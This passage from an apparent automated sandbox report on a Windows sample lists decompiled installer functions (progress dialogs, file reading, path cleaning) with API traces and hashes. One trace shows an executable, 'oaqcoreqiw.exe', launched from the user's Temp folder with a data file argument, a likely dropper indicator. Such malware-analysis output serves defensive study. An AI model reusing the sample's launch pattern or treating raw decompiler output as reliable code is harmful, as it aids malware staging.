                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                  						}
                                                  						if(_t38 != 0) {
                                                  							_t28 = _a4;
                                                  							0x422728[_t28] = 0;
                                                  							return _t28;
                                                  						}
                                                  					} else {
                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                  						if(_t27 < 0x1000) {
                                                  							_t27 = lstrcatW(0x422728, _a8);
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
                                                  			}

                                                  APIs
                                                  • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                  • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                  • String ID: ('B
                                                  • API String ID: 1495540970-2332581011
                                                  • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                  • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                  • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                  • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				long _t39;
                                                  				long _t41;
                                                  				void* _t44;
                                                  				signed char _t50;
                                                  				long* _t54;
                                                  
                                                  				if(_a4 + 0xfffffecd > 5) {
                                                  					L18:
                                                  					return 0;
                                                  				}
                                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                  					goto L18;
                                                  				} else {
                                                  					_t50 = _t54[5];
                                                  					if((_t50 & 0xffffffe0) != 0) {
                                                  						goto L18;
                                                  					}
                                                  					_t39 =  *_t54;
                                                  					if((_t50 & 0x00000002) != 0) {
                                                  						_t39 = GetSysColor(_t39);
                                                  					}
                                                  					if((_t54[5] & 0x00000001) != 0) {
                                                  						SetTextColor(_a8, _t39);
                                                  					}
                                                  					SetBkMode(_a8, _t54[4]);
                                                  					_t41 = _t54[1];
                                                  					_v16.lbColor = _t41;
                                                  					if((_t54[5] & 0x00000008) != 0) {
                                                  						_t41 = GetSysColor(_t41);
                                                  						_v16.lbColor = _t41;
                                                  					}
                                                  					if((_t54[5] & 0x00000004) != 0) {
                                                  						SetBkColor(_a8, _t41);
                                                  					}
                                                  					if((_t54[5] & 0x00000010) != 0) {
                                                  						_v16.lbStyle = _t54[2];
                                                  						_t44 = _t54[3];
                                                  						if(_t44 != 0) {
                                                  							DeleteObject(_t44);
                                                  						}
                                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                                  					}
                                                  					return _t54[3];
                                                  				}
                                                  			}










                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                  • GetSysColor.USER32(00000000), ref: 00404686
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                  • SetBkMode.GDI32(?,?), ref: 0040469E
                                                  • GetSysColor.USER32(?), ref: 004046B1
                                                  • SetBkColor.GDI32(?,?), ref: 004046C1
                                                  • DeleteObject.GDI32(?), ref: 004046DB
                                                  • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                  				intOrPtr _t65;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t72;
                                                  				void* _t76;
                                                  				void* _t79;
                                                  
                                                  				_t72 = __edx;
                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                  				_t65 = 2;
                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                  				_t66 = E00402D84(_t65);
                                                  				_t79 = _t66 - 1;
                                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                  				if(_t79 < 0) {
                                                  					L36:
                                                  					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                  				} else {
                                                  					__ecx = 0x3ff;
                                                  					if(__eax > 0x3ff) {
                                                  						 *(__ebp - 0x44) = 0x3ff;
                                                  					}
                                                  					if( *__edi == __bx) {
                                                  						L34:
                                                  						__ecx =  *(__ebp - 0xc);
                                                  						__eax =  *(__ebp - 8);
                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                  						if(_t79 == 0) {
                                                  							 *(_t76 - 4) = 1;
                                                  						}
                                                  						goto L36;
                                                  					} else {
                                                  						 *(__ebp - 0x38) = __ebx;
                                                  						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                  						if( *(__ebp - 0x44) > __ebx) {
                                                  							do {
                                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                  										__eax = __ebp - 0x50;
                                                  										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                  											goto L34;
                                                  										} else {
                                                  											goto L21;
                                                  										}
                                                  									} else {
                                                  										goto L34;
                                                  									}
                                                  								} else {
                                                  									__eax = __ebp - 0x40;
                                                  									_push(__ebx);
                                                  									_push(__ebp - 0x40);
                                                  									__eax = 2;
                                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                  									if(__eax == 0) {
                                                  										goto L34;
                                                  									} else {
                                                  										__ecx =  *(__ebp - 0x40);
                                                  										if(__ecx == __ebx) {
                                                  											goto L34;
                                                  										} else {
                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                  											 *(__ebp - 0x4c) = __ecx;
                                                  											 *(__ebp - 0x50) = __eax;
                                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  												L28:
                                                  												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                  											} else {
                                                  												__ebp - 0x50 = __ebp + 0xa;
                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                  													L21:
                                                  													__eax =  *(__ebp - 0x50);
                                                  												} else {
                                                  													__edi =  *(__ebp - 0x4c);
                                                  													__edi =  ~( *(__ebp - 0x4c));
                                                  													while(1) {
                                                  														_t22 = __ebp - 0x40;
                                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                                  														__eax = 0xfffd;
                                                  														 *(__ebp - 0x50) = 0xfffd;
                                                  														if( *_t22 == 0) {
                                                  															goto L22;
                                                  														}
                                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                  														__edi = __edi + 1;
                                                  														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                  														__eax = __ebp + 0xa;
                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                  															continue;
                                                  														} else {
                                                  															goto L21;
                                                  														}
                                                  														goto L22;
                                                  													}
                                                  												}
                                                  												L22:
                                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  													goto L28;
                                                  												} else {
                                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                  														} else {
                                                  															__ecx =  *(__ebp - 0xc);
                                                  															__edx =  *(__ebp - 8);
                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														}
                                                  														goto L34;
                                                  													} else {
                                                  														__ecx =  *(__ebp - 0xc);
                                                  														__edx =  *(__ebp - 8);
                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														 *(__ebp - 0x38) = __eax;
                                                  														if(__ax == __bx) {
                                                  															goto L34;
                                                  														} else {
                                                  															goto L26;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L37;
                                                  								L26:
                                                  								__eax =  *(__ebp - 8);
                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                  						}
                                                  						goto L34;
                                                  					}
                                                  				}
                                                  				L37:
                                                  				return 0;
                                                  			}








                                                  0x00402c33
                                                  0x00402c39

                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                    • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                  • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                  • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                  • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E004068EF(WCHAR* _a4) {
                                                  				short _t5;
                                                  				short _t7;
                                                  				WCHAR* _t19;
                                                  				WCHAR* _t20;
                                                  				WCHAR* _t21;
                                                  
                                                  				_t20 = _a4;
                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                  					_t20 =  &(_t20[4]);
                                                  				}
                                                  				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                  					_t20 =  &(_t20[2]);
                                                  				}
                                                  				_t5 =  *_t20;
                                                  				_t21 = _t20;
                                                  				_t19 = _t20;
                                                  				if(_t5 != 0) {
                                                  					do {
                                                  						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                  							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                  							_t19 = CharNextW(_t19);
                                                  						}
                                                  						_t20 = CharNextW(_t20);
                                                  						_t5 =  *_t20;
                                                  					} while (_t5 != 0);
                                                  				}
                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                  				while(1) {
                                                  					_push(_t19);
                                                  					_push(_t21);
                                                  					_t19 = CharPrevW();
                                                  					_t7 =  *_t19;
                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                  						break;
                                                  					}
                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                  					if(_t21 < _t19) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t7;
                                                  			}









                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                                                  • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                                                  • CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                                                  • CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 589700163-1439852002
                                                  • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                  • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                  • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                  • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040302E(intOrPtr _a4) {
                                                  				short _v132;
                                                  				long _t6;
                                                  				struct HWND__* _t7;
                                                  				struct HWND__* _t15;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t15 =  *0x420efc;
                                                  					if(_t15 != 0) {
                                                  						_t15 = DestroyWindow(_t15);
                                                  					}
                                                  					 *0x420efc = 0;
                                                  					return _t15;
                                                  				}
                                                  				if( *0x420efc != 0) {
                                                  					return E00406A71(0);
                                                  				}
                                                  				_t6 = GetTickCount();
                                                  				if(_t6 >  *0x42a26c) {
                                                  					if( *0x42a268 == 0) {
                                                  						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                  						 *0x420efc = _t7;
                                                  						return ShowWindow(_t7, 5);
                                                  					}
                                                  					if(( *0x42a314 & 0x00000001) != 0) {
                                                  						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                  						return E004056CA(0,  &_v132);
                                                  					}
                                                  				}
                                                  				return _t6;
                                                  			}








                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                  • GetTickCount.KERNEL32 ref: 00403067
                                                  • wsprintfW.USER32 ref: 00403095
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • CreateDialogParamW.USER32 ref: 004030B9
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                    • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                  • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                  • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                  • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				signed char _v12;
                                                  				unsigned int _v16;
                                                  				void* _v20;
                                                  				intOrPtr _v24;
                                                  				long _v56;
                                                  				void* _v60;
                                                  				long _t15;
                                                  				unsigned int _t19;
                                                  				signed int _t25;
                                                  				struct HWND__* _t28;
                                                  
                                                  				_t28 = _a4;
                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                  				if(_a8 == 0) {
                                                  					L4:
                                                  					_v56 = _t15;
                                                  					_v60 = 4;
                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                  					return _v24;
                                                  				}
                                                  				_t19 = GetMessagePos();
                                                  				_v16 = _t19 >> 0x10;
                                                  				_v20 = _t19;
                                                  				ScreenToClient(_t28,  &_v20);
                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                  				if((_v12 & 0x00000066) != 0) {
                                                  					_t15 = _v8;
                                                  					goto L4;
                                                  				}
                                                  				return _t25 | 0xffffffff;
                                                  			}















                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                  • GetMessagePos.USER32 ref: 00404FA2
                                                  • ScreenToClient.USER32 ref: 00404FBC
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                  				short _v132;
                                                  				void* _t11;
                                                  				WCHAR* _t19;
                                                  
                                                  				if(_a8 == 0x110) {
                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                  					_a8 = 0x113;
                                                  				}
                                                  				if(_a8 == 0x113) {
                                                  					_t11 = E00403012();
                                                  					_t19 = L"unpacking data: %d%%";
                                                  					if( *0x42a270 == 0) {
                                                  						_t19 = L"verifying installer: %d%%";
                                                  					}
                                                  					wsprintfW( &_v132, _t19, _t11);
                                                  					SetWindowTextW(_a4,  &_v132);
                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                  				}
                                                  				return 0;
                                                  			}







                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                  • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                  • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                  • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00402950(void* __ebx) {
                                                  				WCHAR* _t26;
                                                  				void* _t29;
                                                  				long _t37;
                                                  				void* _t49;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t49 = __ebx;
                                                  				_t52 = 0xfffffd66;
